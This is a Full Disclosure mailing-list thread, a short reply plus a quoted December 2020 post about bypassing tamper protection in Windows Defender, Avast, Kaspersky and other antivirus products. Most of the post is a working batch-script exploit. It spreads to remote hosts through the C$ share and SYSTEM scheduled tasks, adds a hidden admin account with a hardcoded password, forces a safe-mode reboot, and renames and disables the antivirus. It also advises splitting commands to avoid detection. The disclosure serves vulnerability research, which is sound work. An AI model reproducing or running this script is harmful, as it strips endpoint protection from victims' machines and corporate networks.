[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-Id: <89D87E95-AD2B-4EEE-A244-C5062C0B4698@logsat.com>
Date: Tue, 8 Dec 2020 11:56:28 -0500
From: Roberto Franceschetti <roberto@...sat.com>
To: Exibar <exibar@...lair.com>
Cc: fulldisclosure@...lists.org
Subject: Re: [FD] Disable Windows Defender and most other 3rd party
antiviruses
No. Secure antivirus deployments would include a "tamper protection" password. You cannot uninstall the AV without knowing that password, even in safe mode. My methods bypasses the tamper protection mechanisms in the AV.
Roberto
> On Dec 8, 2020, at 11:13 AM, Exibar <exibar@...lair.com> wrote:
>
> Would this not be the same as uninstalling the AV application in safemode?
>
> -----Original Message-----
> From: Fulldisclosure [mailto:fulldisclosure-bounces@...lists.org] On Behalf
> Of Roberto Franceschetti
> Sent: Sunday, December 6, 2020 9:01 PM
> To: fulldisclosure@...lists.org
> Subject: [FD] Disable Windows Defender and most other 3rd party antiviruses
>
> Windows Defender and most other antivirus applications can be disabled by
> booting into safe mode and renaming their application directories before
> their AV services are started in Windows. The renaming of the directories
> can be performed by creating a Windows NT Service that is allowed to start
> in Safe Mode. While Windows stops most non-Windows, non-critical services
> from starting when booting in Safe mode, I was able to make sure that my
> service is started by adding it to:
> HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\[service name]
>
> I have successfully tested POCs on fully patched Windows 10 and Windows
> Server 2016 machines. In all cases I was able to disable the following
> antivirus products, even if they each had their flavor of password/tamper
> protection enabled:
> Windows Defender
> Avast
> Kaspersky
> F-Secure
> Bitdefender
> [one more product goes here, but as that vendor recognized the issue and has
> worked on a fix I will not mention it]
>
> The POC consists of a single .bat file that can be used to either disable
> the antivirus on the local machine, or one running on a remote endpoint.
>
> Disclosure: Local admin rights are needed on the victim's PC (very common
> for home users). For a remote exploit, this POC additionally requires the
> attacker to have access to the remote C$ share and to be able to schedule
> tasks remotely. Note that this however is a common scenario for IT tech
> support staff - if just one of them is tricked into executing the exploit,
> this could cause all AV protection on all Windows endpoints in the corporate
> network to be disabled.
>
> A sample exploit to disable both Windows Defender and Avast can be found
> below. The code is self-explanatory. On:
> https://logsat.com/WindowsAVBypass/
>
> you can find more details as to why I'm releasing this publicly, along with
> an additional POC sample that is used to disable Bitdefender. Bitdefender
> detects the original POC as malicious, but all that is needed to bypass that
> AV is to split each command in a separate scheduled task. Please note that
> some A/V might now detect this specific code as malicious, but what matters
> is the methodology that allows to disable the AVs - the steps can be
> performed in several different ways to go undetected.
>
> A screencast showing the POC remotely disabling Avast and Windows Defender
> is at: https://youtu.be/VE3gwXt6uWg
>
> Roberto Franceschetti
> LogSat Software
>
>
> ============= Avast-DisableAV-Remote.bat ================================
>
> REM - Author: Roberto Franceschetti
> REM - Usage - to disable AV on local machine: C:\>Avast-DisableAV-Remote.bat
> REM - Usage - to disable AV on remote machine:
> C:\>Avast-DisableAV-Remote.bat TargetComputerName (must be a hostname - IP
> won't work)
>
> IF NOT [%1] == [] (GOTO Remote) ELSE (GOTO Local)
>
> :Remote
> rem - we are exploiting a remote computer - copy script to victim and
> schedule task to execute it COPY "%~dp0Avast-DisableAV-Remote.bat"
> \\%1\C$\windows\temp\Avast-DisableAV-Remote.bat
> powershell -command "& {$time =
> [DateTime]::Now.AddMinutes(1);$hourMinute=$time.ToString('HH:mm');SchTasks.e
> xe /Create /s %1 /SC ONCE /TN 'DisableAvast' /TR
> 'C:\Windows\temp\Avast-DisableAV-Remote.bat' /ST $hourMinute /F /RU 'SYSTEM'
> /RL HIGHEST }"
> GOTO :eof
>
> :Local
> rem - We are running .bat locally - run the exploit rem - create local admin
> account used to autologin on first safe boot net user AvastBounty "Avast123"
> /ADD net localgroup administrators AvastBounty /add
>
> rem - add autologin registry entries for next reboot powershell -command "&
> { iwr https://live.sysinternals.com/Autologon.exe -OutFile
> c:\windows\temp\Autologon.exe }"
> c:\windows\temp\Autologon.exe -accepteula AvastBounty . Avast123
>
> rem - Now configure the next reboot in safe mode and autologin bcdedit /set
> {default} safeboot minimal
>
> rem - create the batch file executed by the DisableAvast service after the
> safe reboot rem - will rename ProgramFiles\Avast folders/filesystem drivers,
> disable WinDefender rem - will remove the safebot/autologon entries and
> reboot
>
> @echo off
> echo cd c:\windows\temp > c:\windows\temp\DisableAvastAV.bat
> echo ren "C:\Program Files\Avast Software" "Avast Software Disabled" >>
> c:\windows\temp\DisableAvastAV.bat
> echo ren "C:\Program Files\Windows Defender" "Windows Defender Disabled" >>
> c:\windows\temp\DisableAvastAV.bat
> echo ren "C:\Program Files\Windows Defender Advanced Threat Protection"
> "Windows Defender Advanced Threat Protection Disabled" >>
> c:\windows\temp\DisableAvastAV.bat
> echo ren "C:\Program Files (x86)\Windows Defender" "Windows Defender
> Disabled" >> c:\windows\temp\DisableAvastAV.bat
> echo ren "C:\ProgramData\Avast Software" "Avast Software Disabled" >>
> c:\windows\temp\DisableAvastAV.bat
>
> echo sc config "avast! Antivirus" start=disabled >>
> c:\windows\temp\DisableAvastAV.bat
> echo sc config "avast! Tools" start=disabled >>
> c:\windows\temp\DisableAvastAV.bat
> echo sc config "AvastWscReporter" start=disabled >>
> c:\windows\temp\DisableAvastAV.bat
> echo sc config "aswbIDSAgent" start=disabled >>
> c:\windows\temp\DisableAvastAV.bat
> echo sc config WinDefend start=disabled >>
> c:\windows\temp\DisableAvastAV.bat
>
> echo timeout /t 10 >> c:\windows\temp\DisableAvastAV.bat
> echo net stop SAVService >> c:\windows\temp\DisableAvastAV.bat
> echo net stop hmpalertsvc >> c:\windows\temp\DisableAvastAV.bat
> echo timeout /t 10 >> c:\windows\temp\DisableAvastAV.bat
> echo ren "C:\Program Files\Avast" Avast_Disabled >>
> c:\windows\temp\DisableAvastAV.bat
>
> echo reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v
> AutoAdminLogon /f /t REG_SZ /d "0" >> c:\windows\temp\DisableAvastAV.bat
> echo bcdedit /deletevalue {default} safeboot >>
> c:\windows\temp\DisableAvastAV.bat
> echo sc delete DisableAvast >> c:\windows\temp\DisableAvastAV.bat
> rem - echo pause >> c:\windows\temp\DisableAvastAV.bat
> echo shutdown /r /f /t 0 >> c:\windows\temp\DisableAvastAV.bat
>
> rem - now create the Powershell script that will create a
> "DisableAvastAV.exe" that will simply execute the DisableAvastAV.bat batch
> file above:
> rem - this is done as Windows 10 won't allow a service to run a .bat file,
> but a .exe will however run once just fine even if the service fails to
> start
>
> echo $source = @^" > c:\windows\temp\CreateService.ps1
> echo using System; >> c:\windows\temp\CreateService.ps1
> echo class Hello { >> c:\windows\temp\CreateService.ps1
> echo static void Main() { >> c:\windows\temp\CreateService.ps1
> echo
> System.Diagnostics.Process.Start(^"C:\\Windows\\Temp\\DisableAvastAV.bat^");
>>> c:\windows\temp\CreateService.ps1
> echo } >> c:\windows\temp\CreateService.ps1
> echo } >> c:\windows\temp\CreateService.ps1
> echo ^"@ >> c:\windows\temp\CreateService.ps1 echo Add-Type -TypeDefinition
> $source -Language CSharp -OutputAssembly
> ^"C:\Windows\Temp\DisableAvastAV.exe^" >> c:\windows\temp\CreateService.ps1
>
> @echo on
>
> rem - now execute the powershell script to create the DisableAvastAV.exe
> file and install it as a service:
> powershell set-executionpolicy -executionpolicy bypass powershell
> c:\windows\temp\CreateService.ps1 sc create DisableAvast
> binpath="c:\windows\temp\DisableAvastAV.exe" start=auto
>
> rem - this entry will allow the DisableAvast service to run in Safeboot as
> well, otherwise it won't start:
> reg add HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\DisableAvast
> /f /t REG_SZ /d "service"
>
> rem - now reboot... Safe mode will be activated and the DisableAvastAV.exe
> service will run, calling the DisableAvastAV.bat script, renaming the Avast
> folders no longer protected by Tamper Protection rem - pause shutdown /r /f
> /t 0
>
> =============================================
>
> _______________________________________________
> Sent through the Full Disclosure mailing list
> https://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/
>
>
> _______________________________________________
> Sent through the Full Disclosure mailing list
> https://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/
>
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists